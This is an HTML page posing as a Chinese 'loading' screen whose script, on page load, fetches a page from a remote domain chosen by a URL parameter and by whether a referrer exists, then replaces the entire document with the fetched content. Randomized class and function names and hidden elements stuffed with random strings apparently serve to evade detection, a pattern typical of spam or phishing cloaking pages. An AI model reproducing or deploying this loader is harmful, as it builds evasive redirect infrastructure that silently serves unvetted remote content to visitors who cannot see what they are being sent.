<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .wbgIWk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .wbgIWk .dDQm3qhg {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .wbgIWk .content {
            line-height: 50px;
            text-align: center
        }

        .wbgIWk .img {
            width: 100%
        }

        .wbgIWk .Vad6I8Xa {
            text-align: center
        }

        .wbgIWk .Vad6I8Xa span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .wbgIWk .Vad6I8Xa span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .wbgIWk .Vad6I8Xa span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .wbgIWk .Vad6I8Xa span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .wbgIWk .Vad6I8Xa span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .wbgIWk .Vad6I8Xa span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .wbgIWk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KBxudBjXKbr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CdRL6dl = KBxudBjXKbr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CdRL6dl +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CdRL6dl +".html?a=share";
		}
		
        Rl3nLTLj=url+"#"+new Date().getTime();
        Rl3nLTLj && function() {
            $.get(Rl3nLTLj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >q28sUc9yHeo13yowYKs2rEJ743KXBpNfck7PBQiNupXRzyY0F5p6DhtdM6DR5W7pM7FXMuhmviSka27Ko1ljcllo</b>
<b style='display:none' >q28sUc9yHeo13yowYKs2rEJ743KXBpNfck7PBQiNupXRzyY0F5p6DhtdM6DR5W7pM7FXMuhmviSka27Ko1ljcllo</b>
<img  src='' style='display:none'>
<ul style='display:none' >euEgEmICF6p1HtsVTc5hTe4k</ul>
<a  href='#' style='display:none'>WIzx3twII0ZA42kiBUO3F2NubLbCg76SwUllu70i01BBNToUzmRYzNNFYObBokrnutzr3gSvDiBDslkUcD4G1A</a>
<li style='display:none' >jEIVoY7fdUiOmMjscnWvDfdCGZYwk7Agy6hHLOR</li>
<p  style='display:none'>NODFQEIrS6jX6mOVvxd2qF4gU</p><div class="wbgIWk">
    <div class="dDQm3qhg">
        <div class="Vad6I8Xa">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >QgQ43aauZGA582WYhrPiAM0qTs6JxxieyL4lEzzZH</b>
<li style='display:none' >nWAcgpRG6DUsNmcNfuH4puC3XpOWq3ol5YAHOln4YtaLvi7</li>
<p  style='display:none'>PDouv4WVivzzX3BFr0o</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>m35mZXdJyGwKfkivJ6xZjv2hzfQxFLGCUHhr3jNhSU8jpFbfE482qwSIu4FVFKJkMvjme5WZIrengcm</a>
<img  src='' style='display:none'></body>
</html>